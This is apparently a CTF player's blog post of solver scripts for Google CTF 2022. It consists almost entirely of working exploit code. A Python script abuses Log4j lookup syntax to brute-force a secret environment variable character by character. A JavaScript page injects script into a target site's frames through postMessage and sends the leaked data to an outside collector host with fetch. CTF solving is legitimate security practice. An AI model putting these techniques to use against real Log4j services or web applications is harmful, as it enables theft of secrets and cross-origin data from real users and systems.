adragos-logo

Dragos Albastroiu

Security engineer, hacker, CTF player with team @WreckTheLine

Google CTF 2022

July 1, 2022

Solver scripts for Log4j (1 and 2) and postviewer

Log4j


import grequests
import string

burp0_url = "https://log4j2-web.2022.ctfcompetition.com/"
burp0_headers = {"Sec-Ch-Ua": "\"Chromium\";v=\"103\", \".Not/A)Brand\";v=\"99\"", "Accept": "*/*", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Sec-Ch-Ua-Mobile": "?0", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36", "Sec-Ch-Ua-Platform": "\"Windows\"", "Origin": "https://log4j-web.2022.ctfcompetition.com", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty", "Referer": "https://log4j-web.2022.ctfcompetition.com/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9"}

flag = 'CTF.and-'

# flag = CTF{and-you-thought-it-was-over-didnt-you}

alph = string.ascii_lowercase + string.digits + '_-'

while True:
reqs = []
for c in alph:
payload = '%replace{${env:FLAG}}{^' + flag + c + '}{${test2}}'

burp0_data = {"text": payload}

reqs.append(grequests.post(burp0_url, headers=burp0_headers, data=burp0_data))


responses = grequests.map(reqs, size = 10)
for i,r in enumerate(responses):
#print(r.text)
if 'Sensitive information detected in output' in r.text:
flag += alph[i]
print(flag)
break
print('done')

#CTF.d95528534d14dc6eb6ae
#CTF{d95528534d14dc6eb6aeb81c994ce8bd}

Postviewer

<script>
var mainWindow = window.open("https://postviewer-web.2022.ctfcompetition.com/", "_blank", "popup=1,noopener=0");
onmessage = (e) => {
//if (e.data != "hi" && e.data != "blob loaded")
fetch("https://eknyzfhb.requestrepo.com/?x=" + e.data)
console.log(e.data);
}

const getParamsFromURI = ( uri ) => {
// Get everything after the `?`
const [ , paramString ] = uri.split( '?' );

// Return parameters
return new URLSearchParams( paramString );
};



var send = 0;
var limit = 400;
var stage = getParamsFromURI(location.search).get('stage');
var fileId = 1;

if (stage == "first") {
fileId = 1;
} else if (stage == "second") {
fileId = 2;
} else if (stage == "third") {
fileId = 3;
}

setTimeout(() => {
mainWindow.close();
if (stage == "first") {
location='/?stage=second';
} else if (stage == "second") {
location='/?stage=third';
} else if (stage == "third") {
location='/?stage=first';
}
}, 5000);


async function checkAndSend() {
console.log(mainWindow.frames.length)

if (send < limit && mainWindow && mainWindow.frames && mainWindow.frames.length >= 1) {
for (let frameIdx = 0; frameIdx < mainWindow.frames.length; frameIdx++) {
let frame = mainWindow.frames[frameIdx]
frame.postMessage({
body: `<script>

onmessage = async (e) => {
if (e.data.attacker) return;
if (typeof e.data === 'object') {
var data = await e.data.body.text();
parent.opener.postMessage("hello" + JSON.stringify(e.data) + data, "*")
}
else
parent.opener.postMessage("hello2" + e.data, "*")
};

document.addEventListener("message", (e) => {
parent.opener.postMessage("hello", "*")
}, true)

dispatchEvent(new Event('unload'));
</scrip\x74>
`
, mimeType: "text/html", attacker: true
}, '*');
}
}

if (send == 200)
for (let j = 0; j < 16; j += 1)
mainWindow.location.href = `https://postviewer-web.2022.ctfcompetition.com/#abc,a[id^='file-']:nth-of-type(${fileId}),a[id='${Math.round(Math.random() * 1000000)}']`;

send++;

if (send > limit + 750) {
clearInterval(t);
send = 0;
fileId++;
}

}

mainWindow.location.href = `https://postviewer-web.2022.ctfcompetition.com/#abc,a[id^='file-'],a[id='${Math.round(Math.random() * 1000000)}']`;

var t = setInterval(checkAndSend, 1)
</script>
Twitter GitHub LinkedIn